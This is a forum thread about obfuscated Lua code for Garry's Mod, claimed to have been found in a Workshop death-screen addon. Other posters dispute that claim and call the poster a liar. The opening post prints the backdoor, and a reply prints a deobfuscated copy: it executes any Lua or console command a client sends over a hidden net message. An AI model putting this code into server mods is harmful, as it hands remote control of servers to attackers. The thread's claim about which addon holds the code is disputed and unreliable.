Obfuscated backdoor found in "Wasted death screen"
8 replies, posted
[CODE] if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
[/CODE]
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=230215823[/url]
This code is like this one that I found: [url]http://fastdl.unitedhosts.org/HAC_Booty_And_BANLOGS/v13_2015/BAN/61425914%20(Lies,%20dardyloominati)/lua/autorun/server/htx_serveredit_lua-3865172368.lua[/url]
wow thats some retro shit, i dunno why anybody would use it these days as you'd need a cac bypass to even use it
[sp] yeah i coded it for MLU like 2 years ago[/sp]
[QUOTE=legendofrobbo;49465567]wow thats some retro shit, i dunno why anybody would use it these days as you'd need a cac bypass to even use it
[sp] yeah i coded it for MLU like 2 years ago[/sp][/QUOTE]
Why would you need a CAC bypass for this if the server had CAC?
deobfuscated it because i was bored
[code]
if SERVER then
util.AddNetworkString("Sandbox_ArmDupe")
net.Receive("Sandbox_ArmDupe", function( length, ply )
if net.ReadBit() == 1 then
RunString(net.ReadString())
else
game.ConsoleCommand(net.ReadString().."\n")
end
end)
end
[/code]
[QUOTE=YourStalker;49465600]Why would you need a CAC bypass for this if the server had CAC?[/QUOTE]
because you need to be able to to run the control panel script on your client otherwise you can't operate the backdoor
I... don't think I'm getting this. What does that piece of code have in relation with my addon?
[QUOTE=AlbertoBC;49471567]I... don't think I'm getting this. What does that piece of code have in relation with my addon?[/QUOTE]
Before you go saying this dude's a liar, go check the addon for yourself. Unless you're able to somehow stealth update Workshop addons without showing a notice, the last update was in September and the latest version doesn't seem to have any sort of code similar to the one in the OP.
[editline]6th January 2016[/editline]
It's worth noting that the OP signed up to make this single post.
[QUOTE=Joeyl10;49471880]Before you go saying this dude's a liar, go check the addon for yourself. Unless you're able to somehow stealth update Workshop addons without showing a notice, the last update was in September and the latest version doesn't seem to have any sort of code similar to the one in the OP.
[editline]6th January 2016[/editline]
It's worth noting that the OP signed up to make this single post.[/QUOTE]
I'm really confused right now, if it hadn't been for code_gs's notification on my steam profile I wouldn't have ever known this. What does this have to do with my addon?
This code is not in the addon, OP Is lying.
Next time don't believe an idiot with 1 post
It was also not updated recently.
[IMG]http://i.imgur.com/IEdIurV.png[/IMG]
Sorry, you need to Log In to post a reply to this thread.